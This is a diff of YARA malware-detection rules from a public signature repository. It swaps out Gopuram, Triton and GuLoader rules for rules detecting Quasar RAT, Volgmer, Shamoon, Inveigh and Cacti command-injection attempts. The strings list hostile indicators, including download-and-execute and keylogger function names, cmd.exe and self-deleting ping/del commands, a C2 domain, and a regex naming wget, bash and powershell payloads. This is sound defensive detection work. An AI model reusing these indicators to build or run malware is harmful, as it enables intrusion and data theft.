+		$s3 = "FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')" ascii
+		$s4 = "[Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]" ascii
+		$s5 = "FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))" ascii
+		$s6 = "[Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]" fullword ascii
+		$s7 = "FromBase64String('TQBlAHQAaABvAGQA')" ascii
+		$s8 = "FromBase64String('VAByAGkAZwBnAGUAcgA=')" ascii
+		$s9 = "[Runtime.InteropServices.CallingConvention]::Winapi," fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-
-rule SIGNATURE_BASE_APT_MAL_Gopuram_Backdoor_Apr23 : FILE
+rule SIGNATURE_BASE_Ps1_Toolkit_Inveigh_Bruteforce_3 : FILE
 {
 	meta:
-		description = "Detects Gopuram backdoor"
-		author = "X__Junior (Nextron Systems)"
-		id = "3ae5ddcb-5601-5dca-85dd-0a4772577fae"
-		date = "2023-02-24"
+		description = "Auto-generated rule - from files Inveigh-BruteForce.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d284e93b-dd65-5a39-84e2-287feb6ae05b"
+		date = "2016-09-04"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L20-L41"
+		reference = "https://github.com/vysec/ps1-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_toolkit.yar#L228-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa3dd1f35d27d23eb775410cceae81d5b767dc0f1636aac67f2d2e988a3ed995"
+		logic_hash = "09afe669e90bd73318a9f9f68fda362451f6611f8585de67176c5dc43f05f937"
 		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
-		hash2 = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash3 = "a2ae1e02bcb977cd003374f551ed32218dbcba3120124e369cc150b9a63fe3b8"
 
 	strings:
-		$x1 = "%s\\config\\TxR\\%s.TxR.0.regtrans-m" ascii
-		$xop = { D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE D1 E8 33 C3 D1 EB A8 01 74 ?? 81 F3 25 A3 87 DE }
-		$opa1 = { 48 89 44 24 ?? 45 33 C9 45 33 C0 33 D2 89 5C 24 ?? 48 89 74 24 ?? 48 89 5C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 44 8D 43 }
-		$opa2 = { 48 89 B4 24 ?? ?? ?? ?? 44 8D 43 ?? 33 D2 48 89 BC 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 45 33 C0 33 D2 8B F8 E8 ?? ?? ?? ?? 8D 4F ?? E8 ?? ?? ?? ?? 4C 8B 4C 24 ?? 44 8D 43 ?? 48 8B C8 8B D7 48 8B F0 44 8B F7 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? E8  }
+		$s1 = "::FromBase64String('TgBUAEwATQA=')" ascii
+		$s2 = "::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))" ascii
+		$s3 = "::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))" ascii
+		$s4 = "::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))" ascii
+		$s5 = "[Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`" fullword ascii
+		$s6 = "KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA" ascii
+		$s7 = "}.bruteforce_running)" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and filesize < 2MB and pe.characteristics & pe.DLL and 1 of ( $x* ) ) or all of ( $opa* )
+		( uint16( 0 ) == 0xbbef and filesize < 200KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_DLL_Apr23_1 : FILE
+rule SIGNATURE_BASE_Quasar_RAT_1 : FILE
 {
 	meta:
-		description = "Detects DLLs loaded by shellcode loader (6ce5b6b4cdd6290d396465a1624d489c7afd2259a4d69b73c6b0ba0e5ad4e4ad) (relation to Lazarus group)"
+		description = "Detects Quasar RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2abe266-0c21-51aa-9426-46a4f59df937"
-		date = "2023-04-03"
+		id = "36220de3-aa1a-5c34-adae-432d939c811e"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L43-L75"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L10-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e0a8f3896c0119ce399e83fe3e565c66144693e84996aa3d01ca1b6315521782"
+		logic_hash = "7cceccb7c283774318f6285b482a422566f4f821eb51d564104205783401931a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
-		hash3 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
-		hash4 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
-		hash5 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+		hash2 = "1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec"
+		hash3 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+		hash4 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
-		$s1 = "Windows %d(%d)-%s" ascii fullword
-		$s2 = "auth_timestamp: " ascii fullword
-		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
-		$op1 = { b8 c8 00 00 00 83 fb 01 44 0f 47 e8 41 8b c5 48 8b b4 24 e0 18 00 00 4c 8b a4 24 e8 18 00 00 48 8b 8d a0 17 00 00 48 33 cc }
-		$op2 = { 33 d2 46 8d 04 b5 00 00 00 00 66 0f 1f 44 00 00 49 63 c0 41 ff c0 8b 4c 84 70 31 4c 94 40 48 ff c2 }
-		$op3 = { 89 5c 24 50 0f 57 c0 c7 44 24 4c 04 00 00 00 c7 44 24 48 40 00 00 00 0f 11 44 24 60 0f 11 44 24 70 0f 11 45 80 0f 11 45 90 }
+		$s1 = "DoUploadAndExecute" fullword ascii
+		$s2 = "DoDownloadAndExecute" fullword ascii
+		$s3 = "DoShellExecute" fullword ascii
+		$s4 = "set_Processname" fullword ascii
+		$op1 = { 04 1e fe 02 04 16 fe 01 60 }
+		$op2 = { 00 17 03 1f 20 17 19 15 28 }
+		$op3 = { 00 04 03 69 91 1b 40 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_APT_UNC4736_NK_MAL_TAXHAUL_3CX_Apr23_1 : FILE
+rule SIGNATURE_BASE_Quasar_RAT_2 : FILE
 {
 	meta:
-		description = "Detects TAXHAUL (AKA TxRLoader) malware used in the 3CX compromise by UNC4736"
-		author = "Mandiant"
-		id = "25a80f98-03d6-59e6-84e6-6d847a6c591e"
-		date = "2023-03-04"
+		description = "Detects Quasar RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0ca795c5-3631-5a99-8675-37558485f478"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "https://www.3cx.com/blog/news/mandiant-initial-results/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_mal_gopuram_apr23.yar#L77-L90"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L35-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f67af611d0b3d96e4aaf7b3b5e49c1fb536e61a430b79ac0a0560ef3773ba140"
-		score = 80
+		logic_hash = "b113cb63b0bb75766c905dd3b327b1b2df228733622df8f7517d3daed72432a3"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
+		hash2 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
+		hash3 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
 
 	strings:
-		$p00_0 = {410f45fe4c8d3d[4]eb??4533f64c8d3d[4]eb??4533f64c8d3d[4]eb}
-		$p00_1 = {4d3926488b01400f94c6ff90[4]41b9[4]eb??8bde4885c074}
+		$x1 = "GetKeyloggerLogsResponse" fullword ascii
+		$x2 = "get_Keylogger" fullword ascii
+		$x3 = "HandleGetKeyloggerLogsResponse" fullword ascii
+		$s1 = "DoShellExecuteResponse" fullword ascii
+		$s2 = "GetPasswordsResponse" fullword ascii
+		$s3 = "GetStartupItemsResponse" fullword ascii
+		$s4 = "<GetGenReader>b__7" fullword ascii
+		$s5 = "RunHidden" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Maldoc_Excelmacro : FILE
+rule SIGNATURE_BASE_MAL_Quasarrat_May19_1 : FILE
 {
 	meta:
-		description = "Detects malicious Excel macro Artifacts"
-		author = "James Quinn"
-		id = "76806717-a9a8-520e-b6b6-7718eb088de5"
-		date = "2020-11-03"
-		modified = "2023-12-05"
-		reference = "YARA Exchange - Undisclosed Macro Builder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_macro_builders.yar#L2-L19"
+		description = "Detects QuasarRAT malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4e82b6a-31f8-59fc-acfa-805c4594680a"
+		date = "2019-05-27"
+		modified = "2023-01-06"
+		reference = "https://blog.ensilo.com/uncovering-new-activity-by-apt10"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L61-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c5d0655eaf2ca36c828675f9673a1d4284ef8719fd9ec1d354ee3284d1fb0a0c"
-		score = 65
+		logic_hash = "a189bce433c71d45fd7f5d7fc284fc5b35c88a7ec616dd392d0e931165263aca"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded"
 
 	strings:
-		$artifact1 = {5c 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 ?? 00 2e 00 ?? 00 ?? 00}
-		$url1 = "http://" wide
-		$url2 = "https://" wide
-		$import1 = "URLDownloadToFileA" wide ascii
-		$macro = "xl/macrosheets/"
+		$x1 = "Quasar.Common.Messages" ascii fullword
+		$x2 = "Client.MimikatzTools" ascii fullword
+		$x3 = "Resources.powerkatz_x86.dll" ascii fullword
+		$x4 = "Uninstalling... good bye :-(" wide
+		$xc1 = { 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00
+               68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00
+               63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00
+               74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00
+               73 }
+		$xc2 = { 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20
+               00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C
+               00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E
+               00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20
+               00 2F 00 61 00 20 00 2F 00 71 00 20 00 2F 00 66
+               00 20 00 }
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 2000KB and $artifact1 and $macro and $import1 and 1 of ( $url* )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_Triton_Trilog : FILE
+rule SIGNATURE_BASE_Crowdstrike_Shamoon_Droppedfile
 {
 	meta:
-		description = "Detects Triton APT malware - file trilog.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ae2c9b47-2a67-50c6-9d2a-dc47b4fa69ef"
-		date = "2017-12-14"
+		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+		author = "Florian Roth"
+		id = "b350f1b1-db73-574b-957b-34e5a84f68b0"
+		date = "2016-02-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/vtQoCQ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_triton.yar#L70-L85"
+		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_shamoon.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6406e9e7651978a6817079945dc801afdb6c16dd107527cbfd9a946eca27a51a"
+		logic_hash = "ed550832b217f7edceea2edf7c4453925ed1759d97db7728f7face6ff10ee361"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e8542c07b2af63ee7e72ce5d97d91036c5da56e2b091aa2afe737b224305d230"
+		tags = ""
 
 	strings:
-		$s1 = "inject.bin" ascii
-		$s2 = "PYTHON27.DLL" fullword ascii
-		$s3 = "payload" ascii
+		$testn123 = "test123" wide
+		$testn456 = "test456" wide
+		$testn789 = "test789" wide
+		$testdomain = "testdomain.com" wide
+		$pingcmd = "ping -n 30 127.0.0.1 >nul" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		( any of ( $testn* ) or $pingcmd ) and $testdomain
 }
-rule SIGNATURE_BASE_MAL_Crime_Win32_Loader_Guloader_1_Experimental : FILE
+rule SIGNATURE_BASE_Dexter_Malware
 {
 	meta:
-		description = "Detects injected GuLoader shellcode bin"
-		author = "@VK_Intel"
-		id = "c37882c6-15dc-54dc-8c10-7e91ea0fc6bd"
-		date = "2020-05-04"
+		description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8be328ec-ba29-50ba-8d35-e2c4dfcae45e"
+		date = "2015-02-10"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1257206565146370050"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_guloader.yar#L2-L15"
+		reference = "http://goo.gl/oBvy8b"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_dexter_trojan.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03b7e0251b1c08798ce310cc4c11adfaa3071409d608c91c30d5fc7e28a079de"
-		score = 50
-		quality = 85
-		tags = "FILE"
-		tlp = "white"
+		logic_hash = "3b05bccce63c1f7e8d6d3f654b611f33da5fc1dbcbd28ff28f817d00bf961e64"
+		score = 70
+		quality = 60
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$djib2_hash = { f8 8b ?? ?? ?? ba 05 15 00 00 89 d3 39 c0 c1 e2 05 81 ff f6 62 f1 87 01 da 0f ?? ?? d9 d0 01 da 83 c6 02 66 ?? ?? ?? 75 ?? c2 04 00}
-		$nt_inject_loader = {8b ?? ?? ba 44 1a 0e 9e 39 d2 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? f8 ba d0 e0 8b 30 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? d9 d0 81 fb 20 af 00 00 8b ?? ?? 39 c9 ba 92 a7 f3 95 e8 ?? ?? ?? ?? 89 ?? ?? 8b ?? ?? 39 d2 ba d0 20 2e d0 e8 ?? ?? ?? ?? 89 ?? ?? f8 8b ?? ?? ba 6a 19 1f 23 d9 d0 e8 ?? ?? ?? ?? d9 d0 89 ?? ?? 81 fb e4 8c 00 00 39 c9 8b ?? ?? ba 19 50 9c c2 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 39 d2 8b ?? ?? fc ba 3d 13 8e 8b e8 ?? ?? ?? ?? d9 d0 89 ?? ?? f8 8b ?? ?? ba 30 3d 7b 2c e8 ?? ?? ?? ??}
+		$s0 = "Java Security Plugin" fullword wide
+		$s1 = "%s\\%s\\%s.exe" fullword wide
+		$s2 = "Sun Java Security Plugin" fullword wide
+		$s3 = "\\Internet Explorer\\iexplore.exe" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-rule SIGNATURE_BASE_SUSP_SVG_JS_Payload_Mar25 : FILE
+rule SIGNATURE_BASE_TA17_318B_Volgmer : FILE
 {
 	meta:
-		description = "Detects a suspicious SVG file that contains a JavaScript payload. This rule is a generic rule that might generate false positives. A match should be further investigated."
-		author = "Florian Roth"
-		id = "cdb22283-8427-5c25-b653-d6d76dd27dc6"
-		date = "2025-03-20"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_svg_js_phish_mar25.yar#L3-L37"
+		description = "Malformed User Agent in Volgmer malware"
+		author = "US CERT"
+		id = "20a7f64b-0fee-5235-ac91-2fc811497ac6"
+		date = "2017-11-15"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318B.yar#L9-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7b4b8e42d4df56412969cd1c38dcb750d21b10a54d257a9b918bd6ae0e0f8d11"
-		hash = "4ae2ebc103f5de7ccfd75603b543d602b5c793e1ef7db19fbb60ff2e42611f75"
-		hash = "b92e9d6f8a516e78b3e848c4b5b2815b406c9478e6be3777f3e784ceedc66f4a"
-		hash = "23ea832d503b02e9edbdbf9ed8ce0b19376d44580d21906d9da834de69f7dfcb"
-		hash = "4f33dff59753773a596798ee58fb899c5382c6ec2951b457554aebe5c05ec0cd"
-		hash = "b8be8e009b08c04857dc2388544d61db57c0dd1841371aa7e4bf3ee2010ef1a8"
-		hash = "cdcbe23f284067c4e863f76370f8612d85bef0410ca0bb5684112a8c16eff21c"
-		hash = "5b3d11109e0d10b9266cbfbb6906e728c4470d752f95769280666d1166df4b43"
-		hash = "a7620155da2a576823dbe7963ff4a5f79702645edb8b2ae67b8af8ba7eac697b"
-		hash = "52e1c6279dc151616bbd85ac7d0abc42cab5850deb6da2e2b20e339f79c3536a"
-		logic_hash = "a9239fd09b656f985b3f930ba7b3ab3999dfcd315010f3bf648fffd5ed0a8834"
-		score = 60
+		logic_hash = "2b3a7e501214767b7d79b33fb560b5611fa3726036a0c98d6f1904a55f306e40"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "<svg xmlns=" ascii fullword
-		$sx1 = "src=\"data:application/ecmascript;base64,"
-		$sx2 = "=\"></script>"
-		$ss1 = "<script type=\"application/ecmascript\">"
-		$ss2 = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100%\" height=\"100%\">"
+		$s = "Mozillar/"
 
 	condition:
-		$a1 in ( 0 .. 1024 ) and ( filesize < 100KB and 1 of ( $sx* ) or filesize < 1MB and 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $s
 }
-rule SIGNATURE_BASE_Malware_QA_Not_Copy : FILE
+
+rule SIGNATURE_BASE_Volgmer_Malware : FILE
 {
 	meta:
-		description = "VT Research QA uploaded malware - file not copy.exe"
+		description = "Detects Volgmer malware as reported in US CERT TA17-318B"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d618389b-ec80-5ad1-be44-4b1f3e36c07d"
-		date = "2016-08-29"
+		id = "a8df5f70-69e7-5c95-8af7-7dda6bb9c77a"
+		date = "2017-11-15"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L13-L37"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_318B.yar#L34-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4001d71101a9c6d4134e7ed4b9b03d34ada62241a668970e21a60d7a23dd7b86"
-		score = 80
+		logic_hash = "898c2734c56a40aa4d24c1eac2dfb7dd1f98b0bdf7a11ab518eef282becb84b6"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1410f38498567b64a4b984c69fe4f2859421e4ac598b9750d8f703f1d209f836"
-
-	strings:
-		$x1 = "U2VydmVyLmV4ZQ==" fullword wide
-		$x2 = "\\not copy\\obj\\Debug\\not copy.pdb" ascii
-		$x3 = "fuckyou888.ddns.net" fullword wide
-		$s1 = "cmd.exe /c ping 0 -n 2 & del \"" fullword wide
-		$s2 = "Server.exe" fullword wide
-		$s3 = "Execute ERROR" fullword wide
-		$s4 = "not copy.exe" fullword wide
-		$s5 = "Non HosT" fullword wide
-		$s6 = "netsh firewall delete allowedprogram" fullword wide
+		hash1 = "ff2eb800ff16745fc13c216ff6d5cc2de99466244393f67ab6ea6f8189ae01dd"
+		hash2 = "8fcd303e22b84d7d61768d4efa5308577a09cc45697f7f54be4e528bbb39435b"
+		hash3 = "eff3e37d0406c818e3430068d90e7ed2f594faa6bb146ab0a1c00a2f4a4809a5"
+		hash4 = "e40a46e95ef792cf20d5c14a9ad0b3a95c6252f96654f392b4bc6180565b7b11"
+		hash5 = "6dae368eecbcc10266bba32776c40d9ffa5b50d7f6199a9b6c31d40dfe7877d1"
+		hash6 = "fee0081df5ca6a21953f3a633f2f64b7c0701977623d3a4ec36fff282ffe73b9"
+		hash7 = "53e9bca505652ef23477e105e6985102a45d9a14e5316d140752df6f3ef43d2d"
+		hash8 = "1d0999ba3217cbdb0cc85403ef75587f747556a97dee7c2616e28866db932a0d"
+
+	strings:
+		$x1 = "User-Agent: Mozillar/5.0" fullword ascii
+		$x2 = "[Cmd] - CMD_BOTCMD_CONNLOG_GET" fullword wide
+		$x3 = "[TestConnect To Bot] - Port = %d" fullword ascii
+		$x4 = "b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7" ascii
+		$s1 = "%sigfx%c%c%c.exe" fullword wide
+		$s2 = "H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT" fullword ascii
+		$s3 = "cmd.exe /c %s > %s 2>&1" fullword wide
+		$s4 = "%s\\dllcache\\%s.dll" fullword ascii
+		$s5 = "Cond Fail." fullword ascii
+		$s6 = "The %s %s%s" fullword ascii
+		$s7 = "%s \"%s\"%s \"%s\" %s \"%s\"" fullword ascii
+		$s8 = "DLL_Spider.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 5 of them )
+		filesize < 400KB and ( 1 of ( $x* ) or ( uint16( 0 ) == 0x5a4d and 2 of them ) ) or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "ea42395e901b33bad504798e0f0fd74b" )
 }
-rule SIGNATURE_BASE_Malware_QA_Update : FILE
+rule SIGNATURE_BASE_EXPL_LOG_Cacti_Commandinjection_CVE_2022_46169_Dec22_1 : CVE_2022_46169
 {
 	meta:
-		description = "VT Research QA uploaded malware - file update.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1dce684d-33b0-5588-8325-2a34c0cde32f"
-		date = "2016-08-29"
+		description = "Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169"
+		author = "Nasreddine Bencherchali"
+		id = "c799a419-87ed-55ea-8ebb-d4da901be4ad"
+		date = "2022-12-27"
 		modified = "2023-12-05"
-		reference = "VT Research QA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_set_qa.yar#L39-L69"
+		reference = "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2022_46169_cacti.yar#L1-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "97e0fec7bb4ebf326b449cc0d65eb9f024b33e1d2e54c6d3893164b66c024b2a"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541"
-		hash2 = "6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e"
+		logic_hash = "6ccd3b830deb5c5d65519274c4c528203a2a14a177382334da87e288174e2cfe"
+		score = 70
+		quality = 60
+		tags = "CVE-2022-46169"
 
 	strings:
-		$x1 = "UnActiveOfflineKeylogger" fullword ascii
-		$x2 = "BTRESULTDownload File|Mass Download : File Downloaded , Executing new one in temp dir...|" fullword ascii
-		$x3 = "ActiveOnlineKeylogger" fullword ascii
-		$x4 = "C:\\Users\\DarkCoderSc\\" ascii
-		$x5 = "Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
-		$x6 = "BTRESULTUpdate from URL|Update : File Downloaded , Executing new one in temp dir...|" fullword ascii
-		$s1 = "MSRSAAP.EXE" fullword wide
-		$s2 = "Command successfully executed!|" fullword ascii
-		$s3 = "BTMemoryLoadLibary: Get DLLEntyPoint failed" fullword ascii
-		$s4 = "I wasn't able to open the hosts file, maybe because UAC is enabled in remote computer!" fullword ascii
-		$s5 = "\\Internet Explorer\\iexplore.exe" ascii
-		$s6 = "ping 127.0.0.1 -n 4 > NUL && \"" fullword ascii
-		$s7 = "BTMemoryGetProcAddress: DLL doesn't export anything" fullword ascii
-		$s8 = "POST /index.php/1.0" fullword ascii
+		$xr1 = /\/remote_agent\.php.{1,300}(whoami|\/bin\/bash|\/bin\/sh|\bwget\b|powershell|cmd \/c|cmd\.exe \/c).{1,300} 200 / ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of them )
+		$xr1
 }
